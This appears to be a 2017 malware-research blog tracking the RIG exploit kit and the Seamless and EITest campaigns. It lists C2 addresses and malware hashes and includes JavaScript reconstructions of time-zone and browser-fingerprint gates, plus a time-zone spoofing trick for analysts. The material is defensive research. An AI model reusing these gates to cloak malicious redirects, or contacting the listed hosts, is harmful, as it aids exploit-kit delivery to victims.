Saturday, August 5, 2017

Malware dropped by RIG(2017 July)

These are the malware samples I observed being dropped by RIG in July.

If you have additional information, please contact me on Twitter (@nao_sec).

Saturday, July 22, 2017

Seamless Campaign Dropping Ramnit Continuously 1

Please read the previous post about the malware dropped in May and June first.
http://www.nao-sec.org/2017/07/malware-dropped-by-rig2017-may-june.html

The addresses of the known C2 servers introduced in other blogs are as follows:

  • 142.4.204.195
  • 34.194.213.50 - aofmfaoc.com
  • 87.106.190.153
  • 62.173.141.41 - gssbjwhoose.com
  • 185.118.65.143 - hdyejdn638ir8.com

Refer to the following:

The domain names are rotated immediately, while each IP address is reused several times. Below I report Ramnit C2 servers that connect to these same C2 addresses.

Network Based IOCs

  • 162.255.119.204 - onaxjbfinflx.com
  • 162.255.119.206 - lwqmgevnftflytvbgs.com
  • 162.255.119.18 - sinjydtrv.com
  • 162.255.119.193 - mrthpcokvjc.com
  • 185.118.66.222 - xomeommdilsq.com
  • 166.78.144.80 - ydchosmhwljjrq.com
  • 185.20.225.124 - g283yr84iri4i.com
  • 62.173.141.42 - ypfptjsuthmaaebx.com

Malware Correlation





Wednesday, July 12, 2017

Malware dropped by RIG(2017 May-June)

These are the malware samples I observed being dropped by RIG between May and June. If you have additional information, please contact me on Twitter (@nao_sec).

Wednesday, July 5, 2017

Seamless localized to Japan

An article published by malwarebreakdown two days ago was very interesting.
https://malwarebreakdown.com/2017/07/03/seamless-campaign-leads-to-rig-ek-at-188-225-79-43-and-drops-ramnit/

This post supplements that article.

---

That excellent article introduced some of the redirect flows and the latter half of the chain. Here I introduce the first half.

The visitor is first redirected to "194.58.60.51/usa" by a malicious ad. "usa" looks like an ordinary web page; part of the actual code is shown below.



It looks like ordinary code, but it contains an obfuscated block. Decoded, it is as follows.



This looks like Google Analytics code, but it is actually something different: it sends a POST request to "usa".



It uses JavaScript to obtain the visitor's time zone and sends it to the server. If a Japanese time zone is sent at this point, the visitor is redirected to an ordinary website; if a US time zone is sent, the visitor is led to the next stage of the flow.

That next stage redirects to "outedward-engrees.com". Accessing "outedward-engrees.com" looks like this.



Please see the malwarebreakdown article for what follows :)

---

Well, I made an interesting discovery by chance. I looked up "194.58.60.51" on VirusTotal and got this information.


Surprisingly, "japan.php" exists on the same server!

The "japan.php" code is exactly the same as "usa", but the time zone you send must be set to Japan in order to be connected to RigEK.



"usa" redirected to "signup3.php", whereas "japan.php" redirects to "signup1.php".

The dropped malware is Ramnit as usual.
https://www.hybrid-analysis.com/sample/3f949006c99d03b15ea4a1a11b40f1cf420573d2c86f1025a3b82badf18dc361?environmentId=100
https://virustotal.com/en/file/3f949006c99d03b15ea4a1a11b40f1cf420573d2c86f1025a3b82badf18dc361/analysis/1499245648/
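The two gate pages above ("usa" and "japan.php") are the same time-zone check with different target regions. The following is an added example, not code from the campaign or from this blog, that models that gate in JavaScript together with the one trick an analyst needs to reach the Japan-only branch from a non-Japanese machine. The mapping from UTC offset to region, the beacon field name "tz", the next hops being relative paths, and the decoy URL are assumptions for the demo; the page only shows the real script as screenshots.

```javascript
// Added illustration of the time-zone gate described above; it is not the
// campaign's own code. Branch targets, region ranges and the beacon field
// name are assumptions for the demo.

// Date#getTimezoneOffset() returns the minutes the local zone is *behind* UTC,
// so Japan (UTC+9) reports -540 and US zones report +240 (EDT) .. +600 (HST).
const REGION_BY_OFFSET = [
  { region: 'JP', min: -540, max: -540 },
  { region: 'US', min: 240, max: 600 },   // assumed: anything in the US range
];

function regionFromOffset(offsetMinutes) {
  const hit = REGION_BY_OFFSET.find(r => offsetMinutes >= r.min && offsetMinutes <= r.max);
  return hit ? hit.region : 'OTHER';
}

// Client side: the decoded "Google Analytics" look-alike POSTs the time zone
// back to the gate page. The field name "tz" is an assumption.
function buildBeacon(tzOffsetMinutes) {
  return new URLSearchParams({ tz: String(tzOffsetMinutes) }).toString();
}

function clientBeacon() {
  return buildBeacon(new Date().getTimezoneOffset());
}

// Server side: each gate page on 194.58.60.51 is after one region; a matching
// visitor goes on to the next hop, everyone else gets an ordinary site.
const GATES = {
  'usa':       { wants: 'US', next: 'signup3.php' },
  'japan.php': { wants: 'JP', next: 'signup1.php' },
};
const DECOY = 'https://example.com/';   // placeholder for the harmless site

function routeVisitor(gate, beaconBody) {
  const g = GATES[gate];
  if (!g) throw new Error('unknown gate: ' + gate);
  const tz = Number(new URLSearchParams(beaconBody).get('tz'));
  return regionFromOffset(tz) === g.wants ? g.next : DECOY;
}

// Analyst side: to trigger the Japan-only branch from abroad, make the page's
// own `new Date().getTimezoneOffset()` report the target zone before its
// script runs. The original method is restored afterwards.
function withSpoofedTimezone(offsetMinutes, fn) {
  const original = Date.prototype.getTimezoneOffset;
  Date.prototype.getTimezoneOffset = function () { return offsetMinutes; };
  try {
    return fn();
  } finally {
    Date.prototype.getTimezoneOffset = original;
  }
}

// Demo: the same client script, once as a JST browser and once as US Eastern.
const fromJapan = withSpoofedTimezone(-540, clientBeacon);
const fromUs = withSpoofedTimezone(240, clientBeacon);
console.log('usa       <- JST:', routeVisitor('usa', fromJapan));        // decoy
console.log('japan.php <- JST:', routeVisitor('japan.php', fromJapan));  // signup1.php
console.log('usa       <- EDT:', routeVisitor('usa', fromUs));           // signup3.php
```

In a real browser session the prototype override has to be in place before the gate's script executes (a user script or devtools override), since the page reads the offset once and sends it immediately.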

---

P.S. Added a pcap link.
https://gist.github.com/koike/8f3fcbb2e6906e29155a57d6f87df396


Localizations for countries other than Japan may also exist.
If you know of any, please let me know ;)

Thursday, May 25, 2017

New EITest's Cloaking

First

(In JST) EITest has been observed again since last night, but many researchers say they cannot observe it. In short, this EITest run seems to be targeting only some Asian countries, including Japan.

Experiment

I accessed an EITest-compromised site using IP addresses from various countries, with the following results.

Japan



HongKong



UK



America



Netherlands



Singapore



Finally

I found that there are three types of EITest inject code, switched by geolocation. I don't know the details, but the UK and America seem to be redirected somewhere other than RigEK. Only some Asian countries, such as Japan and Hong Kong, seem to be redirected to RigEK.
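The experiment above amounts to fetching the same compromised URL from several vantage points and comparing what was injected. The following is an added example, not this blog's tooling, of the comparison step: it pulls the injected script blocks out of each response, normalises the per-visit noise (session ids, timers) so that the same inject fetched twice fingerprints identically, and groups vantage points by inject. The six responses are constructed for the demo with documentation IPs and made-up ids; they are not the real EITest code, and which countries share a cluster is illustrative only.

```javascript
// Added example of clustering per-country responses by injected script; not
// the blog's own tooling. RESPONSES is constructed sample data, not EITest.

const PAGE = '<html><head><title>Shop</title></head><body><p>hello</p>';

const RESPONSES = {
  Japan:       PAGE + '<script>var f=document.createElement("iframe");f.src="http://203.0.113.10/?id=8f3a9c21d4";f.style.display="none";document.body.appendChild(f);</script></body></html>',
  HongKong:    PAGE + '<script>var f=document.createElement("iframe");f.src="http://203.0.113.10/?id=b71e0c4aa9";f.style.display="none";document.body.appendChild(f);</script></body></html>',
  UK:          PAGE + '<script>setTimeout(function(){location.href="http://198.51.100.7/go?s=1a2b3c4d5e";},1500);</script></body></html>',
  America:     PAGE + '<script>setTimeout(function(){location.href="http://198.51.100.7/go?s=99aa11bb22";},1500);</script></body></html>',
  Netherlands: PAGE + '<script>document.cookie="vst=4c1d9e77a0;path=/";</script></body></html>',
  Singapore:   PAGE + '<script>document.cookie="vst=0e5f7a8b9c;path=/";</script></body></html>',
};

const SCRIPT_RE = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;

// Inline script bodies only; external src= scripts would need fetching.
function extractScripts(html) {
  const out = [];
  for (const m of html.matchAll(SCRIPT_RE)) out.push(m[1]);
  return out;
}

// Strip what legitimately varies between two fetches of the same inject
// (whitespace, hex ids, long numbers) so the fingerprint tracks the code,
// not the per-visit token.
function normalise(js) {
  return js
    .replace(/\s+/g, '')
    .replace(/[0-9a-f]{8,}/gi, '<HEX>')
    .replace(/\d{4,}/g, '<NUM>')
    .toLowerCase();
}

// 32-bit FNV-1a, enough to key a handful of responses.
function fnv1a(str) {
  let h = 0x811c9dc5;
  for (let i = 0; i < str.length; i++) {
    h ^= str.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h.toString(16).padStart(8, '0');
}

function fingerprint(html) {
  const scripts = extractScripts(html).map(normalise);
  return scripts.length ? fnv1a(scripts.join('|')) : 'no-script';
}

// Group vantage points whose responses carry the same (normalised) inject.
function clusterByInject(responses) {
  const groups = new Map();
  for (const [country, html] of Object.entries(responses)) {
    const fp = fingerprint(html);
    if (!groups.has(fp)) {
      groups.set(fp, { fingerprint: fp, countries: [], sample: extractScripts(html)[0] || '' });
    }
    groups.get(fp).countries.push(country);
  }
  return [...groups.values()];
}

for (const g of clusterByInject(RESPONSES)) {
  console.log(g.fingerprint, g.countries.join(', '), '->', g.sample.slice(0, 60));
}
```

To use it on live data, replace RESPONSES with the raw bodies saved from each exit node; keep the bodies, not just the fingerprints, so a new cluster can be read straight away.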

Wednesday, May 24, 2017

Analyzing Rig Exploit Kit vol.3

First

I have introduced RigEK's behavior several times so far; this time I introduce the changes it has gone through. Those who do not know the previous RigEK should refer to the following.

https://github.com/nao-sec/RigEK/blob/master/README-en.md

Step 0

The beginning of this incident was a tweet by @BroadAnalysis.

EITest was observed again.

Rig Exploit Kit via EiTest campaign from 109.234.36.68 delivers Mole ransomware

I had not observed EITest since April 28. Now that it has been observed again, please see the @BroadAnalysis blog for the specific traffic.

What I introduce this time is the change in RigEK's behavior. I had been continuously observing Decimal IP and Seamless, but I have been unable to observe them for several days. It seems that RigEK changed while I could not observe them.

Step 1

The chain begins with the familiar EITest inject code.



EITest's inject code dynamically generates an iframe that redirects to RigEK. Previously, this redirect returned a landing page containing obfuscated JavaScript directly to the user, but now it is different.



Let's follow the process.

Step 2

This HTML is loaded by the iframe on line 12. When the iframe loads, its onload event fires and start() is called. start() is as follows.



It calls getBrowser() and checks the user's browser fingerprint. Let's look at getBrowser().



RigEK uses the information obtained this way to check whether the user is in the target environment. If the user has not spoofed the browser information and the browser is IE, a form tag is created and the user is sent to the next stage with an HTTP POST.

Step 3

After that, it is the same as before. The HTML containing the obfuscated JavaScript is loaded, and exploits for several vulnerabilities are attempted. The exploit code used does not seem to have changed in particular.
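The gate in Steps 1-3 is shown above only as screenshots, so the following is an added reconstruction of its logic, not RigEK's code: getBrowser() parses the User-Agent, a consistency check compares the claimed browser with what the page can actually observe, and start() hands a genuine IE visitor to stage 2 with a POST. The function names follow the post; the specific consistency checks (documentMode, ActiveXObject, window.chrome), the POST field names, and the stage-2 URL are assumptions for the demo. The `env` object stands in for the DOM/BOM properties a browser would expose, which is what lets the gate run outside a browser and be replayed by a fetcher.

```javascript
// Added reconstruction of the iframe gate described in Steps 1-3; not RigEK's
// own code. Names start()/getBrowser() follow the post; checks, field names
// and URLs are assumptions.

// Parse browser family and major version out of a User-Agent string.
// Edge is tested before Chrome because Edge UAs also contain "Chrome/".
function getBrowser(ua) {
  let m;
  if ((m = /Trident\/\d+[^)]*rv:(\d+)/.exec(ua))) return { name: 'IE', version: Number(m[1]) };
  if ((m = /MSIE (\d+)/.exec(ua)))                return { name: 'IE', version: Number(m[1]) };
  if ((m = /Edge\/(\d+)/.exec(ua)))               return { name: 'Edge', version: Number(m[1]) };
  if ((m = /Chrome\/(\d+)/.exec(ua)))             return { name: 'Chrome', version: Number(m[1]) };
  if ((m = /Firefox\/(\d+)/.exec(ua)))            return { name: 'Firefox', version: Number(m[1]) };
  return { name: 'Other', version: 0 };
}

// `env` mirrors what the page could read from the live browser: real IE has a
// numeric document.documentMode, exposes ActiveXObject, and has no
// window.chrome. A fetcher that only rewrites its User-Agent fails this.
function isGenuineIE(ua, env) {
  if (getBrowser(ua).name !== 'IE') return false;
  return typeof env.documentMode === 'number' && env.hasActiveX === true && !env.hasChrome;
}

// The POST hand-off as an HTML form, which is how the post says stage 2 is
// reached. Attribute values are escaped so the form cannot break itself.
function buildPostForm(action, fields) {
  const esc = s => String(s).replace(/[&<>"]/g, c => ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;' }[c]));
  const inputs = Object.entries(fields)
    .map(([k, v]) => `<input type="hidden" name="${esc(k)}" value="${esc(v)}">`)
    .join('');
  return `<form method="POST" action="${esc(action)}">${inputs}</form>`;
}

// What the iframe's onload handler does: fingerprint, drop non-targets, and
// otherwise produce the stage-2 request. In the browser the form would be
// appended to the document and submitted; here it is returned so a fetcher
// can replay the same POST.
function start(ua, env, stage2Url) {
  if (!isGenuineIE(ua, env)) return null;
  const b = getBrowser(ua);
  const fields = { br: b.name, ver: String(b.version), dm: String(env.documentMode) }; // assumed names
  return {
    method: 'POST',
    url: stage2Url,
    body: new URLSearchParams(fields).toString(),
    form: buildPostForm(stage2Url, fields),
  };
}

const IE11 = 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
const CHROME = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36';
const STAGE2 = 'http://192.0.2.10/?';   // documentation IP; real gate URLs vary

console.log(start(IE11, { documentMode: 11, hasActiveX: true, hasChrome: false }, STAGE2));
console.log(start(IE11, { hasActiveX: false, hasChrome: true }, STAGE2));   // UA-only spoof -> null
console.log(start(CHROME, { hasChrome: true }, STAGE2));                    // not a target -> null
```

The practical consequence for a fetcher is the one the post draws: the landing page is no longer a GET of the iframe URL, so the tool has to execute (or emulate) start() and issue the POST it builds, which is what the mal_getter update below adds.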

Finally

In this way, RigEK has changed to use a POST request. This technique is not uncommon, but it shows that RigEK is still evolving. I will continue tracking RigEK.

P.S.

Regarding this change in RigEK, my mal_getter already supports it :)

https://github.com/nao-sec/mal_getter

Wednesday, May 17, 2017

Malware dropped by RIG(2017 Feb-Apr)

These are the malware samples I observed being dropped by RIG between February and April.
I do not know how reliable the compile timestamps are, but some samples were compiled just before being dropped.
Some families carry much older compile times.

EITest

Columns: family / found_time (JST) / compile time / tweet / VirusTotal / Hybrid Analysis / reference

Dreambot
  found_time (JST): 2017/02/23 8:11
  compile time: 2017:02:23 01:44:03+01:00
  tweet: https://twitter.com/nao_sec/status/834574645848272897
  VirusTotal: https://www.virustotal.com/en-gb/file/a51f24f534c3db9851fc3bea661c8b1aead926eba918c722d58a31693defb13a/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/a51f24f534c3db9851fc3bea661c8b1aead926eba918c722d58a31693defb13a
  reference: http://www.malware-traffic-analysis.net/2017/02/23/index.html

Ursnif
  found_time (JST): 2017/02/27 (2017/02/25 5:26)
  compile time: 2017:02:26 06:20:43+01:00
  tweet: https://twitter.com/nao_sec/status/835681676185382912
  VirusTotal: https://www.virustotal.com/en-gb/file/cec0a5b62eab199796b0b1f2732f40d70c7a7ad47a1bbe508e69a33528f7d4e5/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/cec0a5b62eab199796b0b1f2732f40d70c7a7ad47a1bbe508e69a33528f7d4e5
  reference: http://www.malware-traffic-analysis.net/2017/02/27/index.html

CryptoShield
  found_time (JST): 2017/02/27 1:22
  compile time: 2017:02:28 11:32:32+01:00
  tweet: https://twitter.com/nao_sec/status/835889445735817217
  VirusTotal: https://www.virustotal.com/en-gb/file/177782be48ed39b66a70c51f592f0b3ac31a8aefe5f809eb45ee9d8bb18c2946/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/177782be48ed39b66a70c51f592f0b3ac31a8aefe5f809eb45ee9d8bb18c2946
  reference: http://www.malware-traffic-analysis.net/2017/02/28/index.html

Cerber
  found_time (JST): 2017/03/18 3:07
  compile time: 2014:09:11 08:28:00+01:00
  VirusTotal: https://www.virustotal.com/en-gb/file/409a71c97dee87fbafa63e8d9025f63e7eb21dce3239b4952296db217a744264/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/409a71c97dee87fbafa63e8d9025f63e7eb21dce3239b4952296db217a744264
  reference: http://www.malware-traffic-analysis.net/2017/03/20/index.html

Spora matrix
  found_time (JST): 2017/04/06 11:11
  compile time: 2012:07:26 15:06:56+01:00, 2014:09:11 08:28:00+01:00
  VirusTotal: https://www.virustotal.com/en-gb/file/1809aa1e4d1ed14722417ee284cea229fac1c09b8c14434f7e1b2ea8547c5aeb/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/1809aa1e4d1ed14722417ee284cea229fac1c09b8c14434f7e1b2ea8547c5aeb
  reference: http://www.malware-traffic-analysis.net/2017/04/07/index.html

matrix
  found_time (JST): 2017/04/08
  compile time: 2017:04:08 04:32:16+01:00
  VirusTotal: https://www.virustotal.com/en-gb/file/efa729e2537a939a2c5e0acc81a99419d7477b6ab5fd4089bd85fd85087c9bcc/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/efa729e2537a939a2c5e0acc81a99419d7477b6ab5fd4089bd85fd85087c9bcc
  reference: http://www.malware-traffic-analysis.net/2017/04/07/index.html

matrix
  found_time (JST): 2017/04/08
  compile time: 2017:04:08 04:32:16+01:00
  VirusTotal: https://www.virustotal.com/en-gb/file/1ec63d6d3d85b014e743d291c79d5d350e13167a0343873e8303098e74c72557/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/1ec63d6d3d85b014e743d291c79d5d350e13167a0343873e8303098e74c72557

matrix
  found_time (JST): 2017/04/08
  compile time: 2017:04:08 04:19:19+01:00
  VirusTotal: https://www.virustotal.com/en-gb/file/7aeaec6fa2ac8a5d4b9f0de78c39ba978b9b3f39ad422b12d567ed730a54be47/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/7aeaec6fa2ac8a5d4b9f0de78c39ba978b9b3f39ad422b12d567ed730a54be47

QuantLoader Spora
  found_time (JST): 2017/04/15 0:58
  compile time: 2016:03:09 11:15:32+01:00, 2015:10:19 04:22:40+01:00
  VirusTotal: https://www.virustotal.com/en-gb/file/f63e5ca44a32340c975bf5613b1cfd2202762e4a42f1f21deb71de18894b9304/analysis/
  VirusTotal: https://www.virustotal.com/en-gb/file/2181633d9bdb10fd4420a6aef5d5fa9e9a69ab7de4e99063ae44716188e394e1/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/f63e5ca44a32340c975bf5613b1cfd2202762e4a42f1f21deb71de18894b9304
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/2181633d9bdb10fd4420a6aef5d5fa9e9a69ab7de4e99063ae44716188e394e1
  reference: http://www.malware-traffic-analysis.net/2017/04/15/index.html

QuantLoader Spora
  found_time (JST): 2017/04/16 (2017/04/05 7:56)
  compile time: 2017:02:26 02:21:55+01:00, 2021:01:27 12:31:12+01:00
  VirusTotal: https://www.virustotal.com/en-gb/file/26134f16143eb1d5fc2a13f51929166db18a9e04ea381a9bd23cabea24508879/analysis/
  VirusTotal: https://www.virustotal.com/en-gb/file/8a2eafed0b59841f76b0c23bddeb9e3cadfebba4c04a7d24694273642ffec109/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/26134f16143eb1d5fc2a13f51929166db18a9e04ea381a9bd23cabea24508879
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/8a2eafed0b59841f76b0c23bddeb9e3cadfebba4c04a7d24694273642ffec109
  reference: http://www.malware-traffic-analysis.net/2017/04/16/index.html

Spora
  found_time (JST): 2017/4/18 (2017/04/07 22:51:00)
  compile time: 2015:10:19 04:22:40+01:00
  tweet: https://twitter.com/nao_sec/status/837500077107113984
  VirusTotal: https://www.virustotal.com/en-gb/file/bab239409230dac6733cd1492b154dbdd83e2dffc38e4d95bafdec98554c11ab/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/bab239409230dac6733cd1492b154dbdd83e2dffc38e4d95bafdec98554c11ab
  reference: http://malware-traffic-analysis.net/2017/04/18/index.html

mole
  found_time (JST): 2017/04/26 10:21
  compile time: 2017:04:25 20:59:52+01:00
  tweet: https://twitter.com/nao_sec/status/857042029141819393
  VirusTotal: https://www.virustotal.com/en-gb/file/ca6624ec06c043bf9624260a7b6f437cf7c29d5909306ebd7972f113e4834ec3/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/ca6624ec06c043bf9624260a7b6f437cf7c29d5909306ebd7972f113e4834ec3

QuantLoader
  found_time (JST): 2017/04/26 13:28
  compile time: 2017:04:23 15:26:57+01:00
  tweet: https://twitter.com/nao_sec/status/857088936786747392
  VirusTotal: https://www.virustotal.com/en-gb/file/7546df1244096b3c70f7f5da33d367ce43bf4bfd397568a4adf51a23fa3cd0af/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/7546df1244096b3c70f7f5da33d367ce43bf4bfd397568a4adf51a23fa3cd0af

mole
  found_time (JST): 2017/04/27 14:28
  compile time: 2017:04:26 21:08:06+01:00
  tweet: https://twitter.com/nao_sec/status/857466502840057856
  VirusTotal: https://www.virustotal.com/en-gb/file/57d65f730b3a1d67679ea722cdb562a9e161b11cdf993ef773271589895a3572/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/57d65f730b3a1d67679ea722cdb562a9e161b11cdf993ef773271589895a3572

mole
  found_time (JST): 2017/04/28 14:40
  compile time: 2017:04:27 20:36:35+01:00
  tweet: https://twitter.com/nao_sec/status/857831871077470208
  VirusTotal: https://www.virustotal.com/en-gb/file/2cb9d2943e81b990ec737eced2e49ec556cec22c21ecc7027347485b32e63d36/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/2cb9d2943e81b990ec737eced2e49ec556cec22c21ecc7027347485b32e63d36

mole
  found_time (JST): 2017/04/28 22:56
  compile time: 2017:04:28 11:54:17+01:00
  tweet: https://twitter.com/nao_sec/status/857956617706274816
  VirusTotal: https://www.virustotal.com/en-gb/file/4ee80172598ec7826ad82d4a94c2816b079f9d0557b12d2702eed1365306ebec/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/4ee80172598ec7826ad82d4a94c2816b079f9d0557b12d2702eed1365306ebec

pseudoDarkleech

Columns: family / found_time (JST) / compile time / tweet / VirusTotal / Hybrid Analysis / reference

Cerber
  found_time (JST): 2017/02/22 14:39
  compile time: 2016:04:03 21:18:59+01:00
  tweet: https://twitter.com/nao_sec/status/834277482446532608
  VirusTotal: https://www.virustotal.com/en-gb/file/009cba636ff7b220efb4d24783e77af2471052ffd17fd3d721d84b82ba348af3/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/009cba636ff7b220efb4d24783e77af2471052ffd17fd3d721d84b82ba348af3
  reference: http://www.malware-traffic-analysis.net/2017/02/22/index.html

Cerber
  found_time (JST): 2017/02/27 0:31
  compile time: 2016:04:03 21:18:53+01:00
  tweet: https://twitter.com/nao_sec/status/838535748538097665
  VirusTotal: https://www.virustotal.com/en-gb/file/f7124736a95c472f4c98835786daccdbe751bbd0da4cb500fa0b35d7700d46ef/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/f7124736a95c472f4c98835786daccdbe751bbd0da4cb500fa0b35d7700d46ef
  reference: http://www.malware-traffic-analysis.net/2017/02/27/index.html

Cerber
  found_time (JST): 2017/03/20 1:08
  compile time: 2014:10:07 05:40:10+01:00
  tweet: https://twitter.com/nao_sec/status/834574488230506496
  VirusTotal: https://www.virustotal.com/en-gb/file/1c693f3448d0bd9f300f9f8d752f50db352aea7a8c1961f369291d8e6010fd0d/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/1c693f3448d0bd9f300f9f8d752f50db352aea7a8c1961f369291d8e6010fd0d
  reference: http://www.malware-traffic-analysis.net/2017/03/20/index2.html

GoodMan